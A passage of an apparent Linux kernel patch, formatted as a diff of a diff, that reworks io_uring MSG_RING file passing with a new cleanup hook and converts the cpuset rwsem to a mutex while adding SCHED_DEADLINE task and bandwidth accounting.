+-		return -EINVAL;
+-	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
+-		return -EBADFD;
+-
+-	if (io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
+-		return 0;
+-
+-	return -EOVERFLOW;
+-}
+-
+-static void io_double_unlock_ctx(struct io_ring_ctx *ctx,
+-				 struct io_ring_ctx *octx,
+-				 unsigned int issue_flags)
+-{
+-	if (issue_flags & IO_URING_F_UNLOCKED)
+-		mutex_unlock(&ctx->uring_lock);
+ 	mutex_unlock(&octx->uring_lock);
+ }
+ 
+-static int io_double_lock_ctx(struct io_ring_ctx *ctx,
+-			      struct io_ring_ctx *octx,
++static int io_double_lock_ctx(struct io_ring_ctx *octx,
+ 			      unsigned int issue_flags)
+ {
+ 	/*
+@@ -62,60 +42,86 @@ static int io_double_lock_ctx(struct io_ring_ctx *ctx,
+ 			return -EAGAIN;
+ 		return 0;
+ 	}
++	mutex_lock(&octx->uring_lock);
++	return 0;
++}
+ 
+-	/* Always grab smallest value ctx first. We know ctx != octx. */
+-	if (ctx < octx) {
+-		mutex_lock(&ctx->uring_lock);
+-		mutex_lock(&octx->uring_lock);
+-	} else {
+-		mutex_lock(&octx->uring_lock);
+-		mutex_lock(&ctx->uring_lock);
+-	}
++void io_msg_ring_cleanup(struct io_kiocb *req)
++{
++	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
+ 
+-	return 0;
++	if (WARN_ON_ONCE(!msg->src_file))
++		return;
++
++	fput(msg->src_file);
++	msg->src_file = NULL;
+ }
+ 
+-static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
++static int io_msg_ring_data(struct io_kiocb *req, unsigned int issue_flags)
+ {
+ 	struct io_ring_ctx *target_ctx = req->file->private_data;
+ 	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
+-	struct io_ring_ctx *ctx = req->ctx;
+-	unsigned long file_ptr;
+-	struct file *src_file;
+ 	int ret;
+ 
+-	if (msg->len)
+-		return -EINVAL;
+-	if (target_ctx == ctx)
++	if (msg->src_fd || msg->dst_fd || msg->flags)
+ 		return -EINVAL;
+ 	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
+ 		return -EBADFD;
+ 
+-	ret = io_double_lock_ctx(ctx, target_ctx, issue_flags);
+-	if (unlikely(ret))
+-		return ret;
++	ret = -EOVERFLOW;
++	if (target_ctx->flags & IORING_SETUP_IOPOLL) {
++		if (unlikely(io_double_lock_ctx(target_ctx, issue_flags)))
++			return -EAGAIN;
++		if (io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
++			ret = 0;
++		io_double_unlock_ctx(target_ctx);
++	} else {
++		if (io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
++			ret = 0;
++	}
+ 
+-	ret = -EBADF;
+-	if (unlikely(msg->src_fd >= ctx->nr_user_files))
+-		goto out_unlock;
++	return ret;
++}
+ 
+-	msg->src_fd = array_index_nospec(msg->src_fd, ctx->nr_user_files);
+-	file_ptr = io_fixed_file_slot(&ctx->file_table, msg->src_fd)->file_ptr;
+-	if (!file_ptr)
+-		goto out_unlock;
++static struct file *io_msg_grab_file(struct io_kiocb *req, unsigned int issue_flags)
++{
++	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
++	struct io_ring_ctx *ctx = req->ctx;
++	struct file *file = NULL;
++	unsigned long file_ptr;
++	int idx = msg->src_fd;
++
++	io_ring_submit_lock(ctx, issue_flags);
++	if (likely(idx < ctx->nr_user_files)) {
++		idx = array_index_nospec(idx, ctx->nr_user_files);
++		file_ptr = io_fixed_file_slot(&ctx->file_table, idx)->file_ptr;
++		file = (struct file *) (file_ptr & FFS_MASK);
++		if (file)
++			get_file(file);
++	}
++	io_ring_submit_unlock(ctx, issue_flags);
++	return file;
++}
+ 
+-	src_file = (struct file *) (file_ptr & FFS_MASK);
+-	get_file(src_file);
++static int io_msg_install_complete(struct io_kiocb *req, unsigned int issue_flags)
++{
++	struct io_ring_ctx *target_ctx = req->file->private_data;
++	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
++	struct file *src_file = msg->src_file;
++	int ret;
++
++	if (unlikely(io_double_lock_ctx(target_ctx, issue_flags)))
++		return -EAGAIN;
+ 
+ 	ret = __io_fixed_fd_install(target_ctx, src_file, msg->dst_fd);
+-	if (ret < 0) {
+-		fput(src_file);
++	if (ret < 0)
+ 		goto out_unlock;
+-	}
++
++	msg->src_file = NULL;
++	req->flags &= ~REQ_F_NEED_CLEANUP;
+ 
+ 	if (msg->flags & IORING_MSG_RING_CQE_SKIP)
+ 		goto out_unlock;
+-
+ 	/*
+ 	 * If this fails, the target still received the file descriptor but
+ 	 * wasn't notified of the fact. This means that if this request
+@@ -125,10 +131,29 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (!io_post_aux_cqe(target_ctx, msg->user_data, ret, 0, true))
+ 		ret = -EOVERFLOW;
+ out_unlock:
+-	io_double_unlock_ctx(ctx, target_ctx, issue_flags);
++	io_double_unlock_ctx(target_ctx);
+ 	return ret;
+ }
+ 
++static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
++{
++	struct io_ring_ctx *target_ctx = req->file->private_data;
++	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
++	struct io_ring_ctx *ctx = req->ctx;
++	struct file *src_file = msg->src_file;
++
++	if (target_ctx == ctx)
++		return -EINVAL;
++	if (!src_file) {
++		src_file = io_msg_grab_file(req, issue_flags);
++		if (!src_file)
++			return -EBADF;
++		msg->src_file = src_file;
++		req->flags |= REQ_F_NEED_CLEANUP;
++	}
++	return io_msg_install_complete(req, issue_flags);
++}
++
+ int io_msg_ring_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ {
+ 	struct io_msg *msg = io_kiocb_to_cmd(req, struct io_msg);
+@@ -136,6 +161,7 @@ int io_msg_ring_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	if (unlikely(sqe->buf_index || sqe->personality))
+ 		return -EINVAL;
+ 
++	msg->src_file = NULL;
+ 	msg->user_data = READ_ONCE(sqe->off);
+ 	msg->len = READ_ONCE(sqe->len);
+ 	msg->cmd = READ_ONCE(sqe->addr);
+@@ -159,7 +185,7 @@ int io_msg_ring(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	switch (msg->cmd) {
+ 	case IORING_MSG_DATA:
+-		ret = io_msg_ring_data(req);
++		ret = io_msg_ring_data(req, issue_flags);
+ 		break;
+ 	case IORING_MSG_SEND_FD:
+ 		ret = io_msg_send_fd(req, issue_flags);
+diff --git a/io_uring/msg_ring.h b/io_uring/msg_ring.h
+index fb9601f202d07..3987ee6c0e5f1 100644
+--- a/io_uring/msg_ring.h
++++ b/io_uring/msg_ring.h
+@@ -2,3 +2,4 @@
+ 
+ int io_msg_ring_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe);
+ int io_msg_ring(struct io_kiocb *req, unsigned int issue_flags);
++void io_msg_ring_cleanup(struct io_kiocb *req);
+diff --git a/io_uring/opdef.c b/io_uring/opdef.c
+index 04dd2c983fce4..3aa0d65c50e34 100644
+--- a/io_uring/opdef.c
++++ b/io_uring/opdef.c
+@@ -445,6 +445,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.name			= "MSG_RING",
+ 		.prep			= io_msg_ring_prep,
+ 		.issue			= io_msg_ring,
++		.cleanup		= io_msg_ring_cleanup,
+ 	},
+ 	[IORING_OP_FSETXATTR] = {
+ 		.needs_file = 1,
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 73f11e4db3a4d..97ecca43386d9 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -57,6 +57,7 @@
+ #include <linux/file.h>
+ #include <linux/fs_parser.h>
+ #include <linux/sched/cputime.h>
++#include <linux/sched/deadline.h>
+ #include <linux/psi.h>
+ #include <net/sock.h>
+ 
+@@ -6681,6 +6682,9 @@ void cgroup_exit(struct task_struct *tsk)
+ 	list_add_tail(&tsk->cg_list, &cset->dying_tasks);
+ 	cset->nr_tasks--;
+ 
++	if (dl_task(tsk))
++		dec_dl_tasks_cs(tsk);
++
+ 	WARN_ON_ONCE(cgroup_task_frozen(tsk));
+ 	if (unlikely(!(tsk->flags & PF_KTHREAD) &&
+ 		     test_bit(CGRP_FREEZE, &task_dfl_cgroup(tsk)->flags)))
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index e276db7228451..db3e05b6b4dd2 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -193,6 +193,14 @@ struct cpuset {
+ 	int use_parent_ecpus;
+ 	int child_ecpus_count;
+ 
++	/*
++	 * number of SCHED_DEADLINE tasks attached to this cpuset, so that we
++	 * know when to rebuild associated root domain bandwidth information.
++	 */
++	int nr_deadline_tasks;
++	int nr_migrate_dl_tasks;
++	u64 sum_migrate_dl_bw;
++
+ 	/* Invalid partition error code, not lock protected */
+ 	enum prs_errcode prs_err;
+ 
+@@ -245,6 +253,20 @@ static inline struct cpuset *parent_cs(struct cpuset *cs)
+ 	return css_cs(cs->css.parent);
+ }
+ 
++void inc_dl_tasks_cs(struct task_struct *p)
++{
++	struct cpuset *cs = task_cs(p);
++
++	cs->nr_deadline_tasks++;
++}
++
++void dec_dl_tasks_cs(struct task_struct *p)
++{
++	struct cpuset *cs = task_cs(p);
++
++	cs->nr_deadline_tasks--;
++}
++
+ /* bits in struct cpuset flags field */
+ typedef enum {
+ 	CS_ONLINE,
+@@ -366,22 +388,23 @@ static struct cpuset top_cpuset = {
+ 		if (is_cpuset_online(((des_cs) = css_cs((pos_css)))))
+ 
+ /*
+- * There are two global locks guarding cpuset structures - cpuset_rwsem and
++ * There are two global locks guarding cpuset structures - cpuset_mutex and
+  * callback_lock. We also require taking task_lock() when dereferencing a
+  * task's cpuset pointer. See "The task_lock() exception", at the end of this
+- * comment.  The cpuset code uses only cpuset_rwsem write lock.  Other
+- * kernel subsystems can use cpuset_read_lock()/cpuset_read_unlock() to
+- * prevent change to cpuset structures.
++ * comment.  The cpuset code uses only cpuset_mutex. Other kernel subsystems
++ * can use cpuset_lock()/cpuset_unlock() to prevent change to cpuset
++ * structures. Note that cpuset_mutex needs to be a mutex as it is used in
++ * paths that rely on priority inheritance (e.g. scheduler - on RT) for
++ * correctness.
+  *
+  * A task must hold both locks to modify cpusets.  If a task holds
+- * cpuset_rwsem, it blocks others wanting that rwsem, ensuring that it
+- * is the only task able to also acquire callback_lock and be able to
+- * modify cpusets.  It can perform various checks on the cpuset structure
+- * first, knowing nothing will change.  It can also allocate memory while
+- * just holding cpuset_rwsem.  While it is performing these checks, various
+- * callback routines can briefly acquire callback_lock to query cpusets.
+- * Once it is ready to make the changes, it takes callback_lock, blocking
+- * everyone else.
++ * cpuset_mutex, it blocks others, ensuring that it is the only task able to
++ * also acquire callback_lock and be able to modify cpusets.  It can perform
++ * various checks on the cpuset structure first, knowing nothing will change.
++ * It can also allocate memory while just holding cpuset_mutex.  While it is
++ * performing these checks, various callback routines can briefly acquire
++ * callback_lock to query cpusets.  Once it is ready to make the changes, it
++ * takes callback_lock, blocking everyone else.
+  *
+  * Calls to the kernel memory allocator can not be made while holding
+  * callback_lock, as that would risk double tripping on callback_lock
+@@ -403,16 +426,16 @@ static struct cpuset top_cpuset = {
+  * guidelines for accessing subsystem state in kernel/cgroup.c
+  */
+ 
+-DEFINE_STATIC_PERCPU_RWSEM(cpuset_rwsem);
++static DEFINE_MUTEX(cpuset_mutex);
+ 
+-void cpuset_read_lock(void)
++void cpuset_lock(void)
+ {
+-	percpu_down_read(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ }
+ 
+-void cpuset_read_unlock(void)
++void cpuset_unlock(void)
+ {
+-	percpu_up_read(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ static DEFINE_SPINLOCK(callback_lock);
+@@ -496,7 +519,7 @@ static inline bool partition_is_populated(struct cpuset *cs,
+  * One way or another, we guarantee to return some non-empty subset
+  * of cpu_online_mask.
+  *
+- * Call with callback_lock or cpuset_rwsem held.
++ * Call with callback_lock or cpuset_mutex held.
+  */
+ static void guarantee_online_cpus(struct task_struct *tsk,
+ 				  struct cpumask *pmask)
+@@ -538,7 +561,7 @@ out_unlock:
+  * One way or another, we guarantee to return some non-empty subset
+  * of node_states[N_MEMORY].
+  *
+- * Call with callback_lock or cpuset_rwsem held.
++ * Call with callback_lock or cpuset_mutex held.
+  */
+ static void guarantee_online_mems(struct cpuset *cs, nodemask_t *pmask)
+ {
+@@ -550,7 +573,7 @@ static void guarantee_online_mems(struct cpuset *cs, nodemask_t *pmask)
+ /*
+  * update task's spread flag if cpuset's page/slab spread flag is set
+  *
+- * Call with callback_lock or cpuset_rwsem held. The check can be skipped
++ * Call with callback_lock or cpuset_mutex held. The check can be skipped
+  * if on default hierarchy.
+  */
+ static void cpuset_update_task_spread_flags(struct cpuset *cs,
+@@ -575,7 +598,7 @@ static void cpuset_update_task_spread_flags(struct cpuset *cs,
+  *
+  * One cpuset is a subset of another if all its allowed CPUs and
+  * Memory Nodes are a subset of the other, and its exclusive flags
+- * are only set if the other's are set.  Call holding cpuset_rwsem.
++ * are only set if the other's are set.  Call holding cpuset_mutex.
+  */
+ 
+ static int is_cpuset_subset(const struct cpuset *p, const struct cpuset *q)
+@@ -713,7 +736,7 @@ out:
+  * If we replaced the flag and mask values of the current cpuset
+  * (cur) with those values in the trial cpuset (trial), would
+  * our various subset and exclusive rules still be valid?  Presumes
+- * cpuset_rwsem held.
++ * cpuset_mutex held.
+  *
+  * 'cur' is the address of an actual, in-use cpuset.  Operations
+  * such as list traversal that depend on the actual address of the
+@@ -829,7 +852,7 @@ static void update_domain_attr_tree(struct sched_domain_attr *dattr,
+ 	rcu_read_unlock();
+ }
+ 
+-/* Must be called with cpuset_rwsem held.  */
++/* Must be called with cpuset_mutex held.  */
+ static inline int nr_cpusets(void)
+ {
+ 	/* jump label reference count + the top-level cpuset */
+@@ -855,7 +878,7 @@ static inline int nr_cpusets(void)
+  * domains when operating in the severe memory shortage situations
+  * that could cause allocation failures below.
+  *
+- * Must be called with cpuset_rwsem held.
++ * Must be called with cpuset_mutex held.
+  *
+  * The three key local variables below are:
+  *    cp - cpuset pointer, used (together with pos_css) to perform a
+@@ -1066,11 +1089,14 @@ done:
+ 	return ndoms;
+ }
+ 
+-static void update_tasks_root_domain(struct cpuset *cs)
++static void dl_update_tasks_root_domain(struct cpuset *cs)
+ {
+ 	struct css_task_iter it;
+ 	struct task_struct *task;
+ 
++	if (cs->nr_deadline_tasks == 0)
++		return;
++
+ 	css_task_iter_start(&cs->css, 0, &it);
+ 
+ 	while ((task = css_task_iter_next(&it)))
+@@ -1079,12 +1105,12 @@ static void update_tasks_root_domain(struct cpuset *cs)
+ 	css_task_iter_end(&it);
+ }
+ 
+-static void rebuild_root_domains(void)
++static void dl_rebuild_rd_accounting(void)
+ {
+ 	struct cpuset *cs = NULL;
+ 	struct cgroup_subsys_state *pos_css;
+ 
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 	lockdep_assert_cpus_held();
+ 	lockdep_assert_held(&sched_domains_mutex);
+ 
+@@ -1107,7 +1133,7 @@ static void rebuild_root_domains(void)
+ 
+ 		rcu_read_unlock();
+ 
+-		update_tasks_root_domain(cs);
++		dl_update_tasks_root_domain(cs);
+ 
+ 		rcu_read_lock();
+ 		css_put(&cs->css);
+@@ -1121,7 +1147,7 @@ partition_and_rebuild_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ {
+ 	mutex_lock(&sched_domains_mutex);
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+-	rebuild_root_domains();
++	dl_rebuild_rd_accounting();
+ 	mutex_unlock(&sched_domains_mutex);
+ }
+ 
+@@ -1134,7 +1160,7 @@ partition_and_rebuild_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+  * 'cpus' is removed, then call this routine to rebuild the
+  * scheduler's dynamic sched domains.
+  *
+- * Call with cpuset_rwsem held.  Takes cpus_read_lock().
++ * Call with cpuset_mutex held.  Takes cpus_read_lock().
+  */
+ static void rebuild_sched_domains_locked(void)
+ {
+@@ -1145,7 +1171,7 @@ static void rebuild_sched_domains_locked(void)
+ 	int ndoms;
+ 
+ 	lockdep_assert_cpus_held();
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 
+ 	/*
+ 	 * If we have raced with CPU hotplug, return early to avoid
+@@ -1196,9 +1222,9 @@ static void rebuild_sched_domains_locked(void)
+ void rebuild_sched_domains(void)
+ {
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	rebuild_sched_domains_locked();
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ }
+ 
+@@ -1208,7 +1234,7 @@ void rebuild_sched_domains(void)
+  * @new_cpus: the temp variable for the new effective_cpus mask
+  *
+  * Iterate through each task of @cs updating its cpus_allowed to the
+- * effective cpuset's.  As this function is called with cpuset_rwsem held,
++ * effective cpuset's.  As this function is called with cpuset_mutex held,
+  * cpuset membership stays stable.
+  */
+ static void update_tasks_cpumask(struct cpuset *cs, struct cpumask *new_cpus)
+@@ -1317,7 +1343,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 	int old_prs, new_prs;
+ 	int part_error = PERR_NONE;	/* Partition error? */
+ 
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 
+ 	/*
+ 	 * The parent must be a partition root.
+@@ -1540,7 +1566,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+  *
+  * On legacy hierarchy, effective_cpus will be the same with cpu_allowed.
+  *
+- * Called with cpuset_rwsem held
++ * Called with cpuset_mutex held
+  */
+ static void update_cpumasks_hier(struct cpuset *cs, struct tmpmasks *tmp,
+ 				 bool force)
+@@ -1700,7 +1726,7 @@ static void update_sibling_cpumasks(struct cpuset *parent, struct cpuset *cs,
+ 	struct cpuset *sibling;
+ 	struct cgroup_subsys_state *pos_css;
+ 
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 
+ 	/*
+ 	 * Check all its siblings and call update_cpumasks_hier()
+@@ -1950,12 +1976,12 @@ static void *cpuset_being_rebound;
+  * @cs: the cpuset in which each task's mems_allowed mask needs to be changed
+  *
+  * Iterate through each task of @cs updating its mems_allowed to the
+- * effective cpuset's.  As this function is called with cpuset_rwsem held,
++ * effective cpuset's.  As this function is called with cpuset_mutex held,
+  * cpuset membership stays stable.
+  */
+ static void update_tasks_nodemask(struct cpuset *cs)
+ {
+-	static nodemask_t newmems;	/* protected by cpuset_rwsem */
++	static nodemask_t newmems;	/* protected by cpuset_mutex */
+ 	struct css_task_iter it;
+ 	struct task_struct *task;
+ 
+@@ -1968,7 +1994,7 @@ static void update_tasks_nodemask(struct cpuset *cs)
+ 	 * take while holding tasklist_lock.  Forks can happen - the
+ 	 * mpol_dup() cpuset_being_rebound check will catch such forks,
+ 	 * and rebind their vma mempolicies too.  Because we still hold
+-	 * the global cpuset_rwsem, we know that no other rebind effort
++	 * the global cpuset_mutex, we know that no other rebind effort
+ 	 * will be contending for the global variable cpuset_being_rebound.
+ 	 * It's ok if we rebind the same mm twice; mpol_rebind_mm()
+ 	 * is idempotent.  Also migrate pages in each mm to new nodes.
+@@ -2014,7 +2040,7 @@ static void update_tasks_nodemask(struct cpuset *cs)
+  *
+  * On legacy hierarchy, effective_mems will be the same with mems_allowed.
+  *
+- * Called with cpuset_rwsem held
++ * Called with cpuset_mutex held
+  */
+ static void update_nodemasks_hier(struct cpuset *cs, nodemask_t *new_mems)
+ {
+@@ -2067,7 +2093,7 @@ static void update_nodemasks_hier(struct cpuset *cs, nodemask_t *new_mems)
+  * mempolicies and if the cpuset is marked 'memory_migrate',
+  * migrate the tasks pages to the new memory.
+  *
+- * Call with cpuset_rwsem held. May take callback_lock during call.
++ * Call with cpuset_mutex held. May take callback_lock during call.
+  * Will take tasklist_lock, scan tasklist for tasks in cpuset cs,
+  * lock each such tasks mm->mmap_lock, scan its vma's and rebind
+  * their mempolicies to the cpusets new mems_allowed.
+@@ -2159,7 +2185,7 @@ static int update_relax_domain_level(struct cpuset *cs, s64 val)
+  * @cs: the cpuset in which each task's spread flags needs to be changed
+  *
+  * Iterate through each task of @cs updating its spread flags.  As this
+- * function is called with cpuset_rwsem held, cpuset membership stays
++ * function is called with cpuset_mutex held, cpuset membership stays
+  * stable.
+  */
+ static void update_tasks_flags(struct cpuset *cs)
+@@ -2179,7 +2205,7 @@ static void update_tasks_flags(struct cpuset *cs)
+  * cs:		the cpuset to update
+  * turning_on: 	whether the flag is being set or cleared
+  *
+- * Call with cpuset_rwsem held.
++ * Call with cpuset_mutex held.
+  */
+ 
+ static int update_flag(cpuset_flagbits_t bit, struct cpuset *cs,
+@@ -2229,7 +2255,7 @@ out:
+  * @new_prs: new partition root state
+  * Return: 0 if successful, != 0 if error
+  *
+- * Call with cpuset_rwsem held.
++ * Call with cpuset_mutex held.
+  */
+ static int update_prstate(struct cpuset *cs, int new_prs)
+ {
+@@ -2467,19 +2493,26 @@ static int cpuset_can_attach_check(struct cpuset *cs)
+ 	return 0;
+ }
+ 
+-/* Called by cgroups to determine if a cpuset is usable; cpuset_rwsem held */
++static void reset_migrate_dl_data(struct cpuset *cs)
++{
++	cs->nr_migrate_dl_tasks = 0;
++	cs->sum_migrate_dl_bw = 0;
++}
++
++/* Called by cgroups to determine if a cpuset is usable; cpuset_mutex held */
+ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ {
+ 	struct cgroup_subsys_state *css;
+-	struct cpuset *cs;
++	struct cpuset *cs, *oldcs;
+ 	struct task_struct *task;
+ 	int ret;
+ 
+ 	/* used later by cpuset_attach() */
+ 	cpuset_attach_old_cs = task_cs(cgroup_taskset_first(tset, &css));
++	oldcs = cpuset_attach_old_cs;
+ 	cs = css_cs(css);
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	/* Check to see if task is allowed in the cpuset */
+ 	ret = cpuset_can_attach_check(cs);
+@@ -2487,21 +2520,46 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 		goto out_unlock;
+ 
+ 	cgroup_taskset_for_each(task, css, tset) {
+-		ret = task_can_attach(task, cs->effective_cpus);
++		ret = task_can_attach(task);
+ 		if (ret)
+ 			goto out_unlock;
+ 		ret = security_task_setscheduler(task);
+ 		if (ret)
+ 			goto out_unlock;
++
++		if (dl_task(task)) {
++			cs->nr_migrate_dl_tasks++;
++			cs->sum_migrate_dl_bw += task->dl.dl_bw;
++		}
+ 	}
+ 
++	if (!cs->nr_migrate_dl_tasks)
++		goto out_success;
++
++	if (!cpumask_intersects(oldcs->effective_cpus, cs->effective_cpus)) {
++		int cpu = cpumask_any_and(cpu_active_mask, cs->effective_cpus);
++
++		if (unlikely(cpu >= nr_cpu_ids)) {
++			reset_migrate_dl_data(cs);
++			ret = -EINVAL;
++			goto out_unlock;
++		}
++
++		ret = dl_bw_alloc(cpu, cs->sum_migrate_dl_bw);
++		if (ret) {
++			reset_migrate_dl_data(cs);
++			goto out_unlock;
++		}
++	}
++
++out_success:
+ 	/*
+ 	 * Mark attach is in progress.  This makes validate_change() fail
+ 	 * changes which zero cpus/mems_allowed.
+ 	 */
+ 	cs->attach_in_progress++;
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	return ret;
+ }
+ 
+@@ -2513,15 +2571,23 @@ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
+ 	cgroup_taskset_first(tset, &css);
+ 	cs = css_cs(css);
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	cs->attach_in_progress--;
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+-	percpu_up_write(&cpuset_rwsem);
++
++	if (cs->nr_migrate_dl_tasks) {
++		int cpu = cpumask_any(cs->effective_cpus);
++
++		dl_bw_free(cpu, cs->sum_migrate_dl_bw);
++		reset_migrate_dl_data(cs);
++	}
++
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /*
+- * Protected by cpuset_rwsem. cpus_attach is used only by cpuset_attach_task()
++ * Protected by cpuset_mutex. cpus_attach is used only by cpuset_attach_task()
+  * but we can't allocate it dynamically there.  Define it global and
+  * allocate from cpuset_init().
+  */
+@@ -2530,7 +2596,7 @@ static nodemask_t cpuset_attach_nodemask_to;
+ 
+ static void cpuset_attach_task(struct cpuset *cs, struct task_struct *task)
+ {
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 
+ 	if (cs != &top_cpuset)
+ 		guarantee_online_cpus(task, cpus_attach);
+@@ -2558,7 +2624,7 @@ static void cpuset_attach(struct cgroup_taskset *tset)
+ 	cs = css_cs(css);
+ 
+ 	lockdep_assert_cpus_held();	/* see cgroup_attach_lock() */
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
+ 
+@@ -2594,11 +2660,17 @@ static void cpuset_attach(struct cgroup_taskset *tset)
+ 
+ 	cs->old_mems_allowed = cpuset_attach_nodemask_to;
+ 
++	if (cs->nr_migrate_dl_tasks) {
++		cs->nr_deadline_tasks += cs->nr_migrate_dl_tasks;
++		oldcs->nr_deadline_tasks -= cs->nr_migrate_dl_tasks;
++		reset_migrate_dl_data(cs);
++	}
++
+ 	cs->attach_in_progress--;
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /* The various types of files and directories in a cpuset file system */
+@@ -2630,7 +2702,7 @@ static int cpuset_write_u64(struct cgroup_subsys_state *css, struct cftype *cft,
+ 	int retval = 0;
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	if (!is_cpuset_online(cs)) {
+ 		retval = -ENODEV;
+ 		goto out_unlock;
+@@ -2666,7 +2738,7 @@ static int cpuset_write_u64(struct cgroup_subsys_state *css, struct cftype *cft,
+ 		break;
+ 	}
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	return retval;
+ }
+@@ -2679,7 +2751,7 @@ static int cpuset_write_s64(struct cgroup_subsys_state *css, struct cftype *cft,
+ 	int retval = -ENODEV;
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	if (!is_cpuset_online(cs))
+ 		goto out_unlock;
+ 
+@@ -2692,7 +2764,7 @@ static int cpuset_write_s64(struct cgroup_subsys_state *css, struct cftype *cft,
+ 		break;
+ 	}
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	return retval;
+ }
+@@ -2725,7 +2797,7 @@ static ssize_t cpuset_write_resmask(struct kernfs_open_file *of,
+ 	 * operation like this one can lead to a deadlock through kernfs
+ 	 * active_ref protection.  Let's break the protection.  Losing the
+ 	 * protection is okay as we check whether @cs is online after
+-	 * grabbing cpuset_rwsem anyway.  This only happens on the legacy
++	 * grabbing cpuset_mutex anyway.  This only happens on the legacy
+ 	 * hierarchies.
+ 	 */
+ 	css_get(&cs->css);
+@@ -2733,7 +2805,7 @@ static ssize_t cpuset_write_resmask(struct kernfs_open_file *of,
+ 	flush_work(&cpuset_hotplug_work);
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	if (!is_cpuset_online(cs))
+ 		goto out_unlock;
+ 
+@@ -2757,7 +2829,7 @@ static ssize_t cpuset_write_resmask(struct kernfs_open_file *of,
+ 
+ 	free_cpuset(trialcs);
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	kernfs_unbreak_active_protection(of->kn);
+ 	css_put(&cs->css);
+@@ -2905,13 +2977,13 @@ static ssize_t sched_partition_write(struct kernfs_open_file *of, char *buf,
+ 
+ 	css_get(&cs->css);
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	if (!is_cpuset_online(cs))
+ 		goto out_unlock;
+ 
+ 	retval = update_prstate(cs, val);
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	css_put(&cs->css);
+ 	return retval ?: nbytes;
+@@ -3124,7 +3196,7 @@ static int cpuset_css_online(struct cgroup_subsys_state *css)
+ 		return 0;
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	set_bit(CS_ONLINE, &cs->flags);
+ 	if (is_spread_page(parent))
+@@ -3175,7 +3247,7 @@ static int cpuset_css_online(struct cgroup_subsys_state *css)
+ 	cpumask_copy(cs->effective_cpus, parent->cpus_allowed);
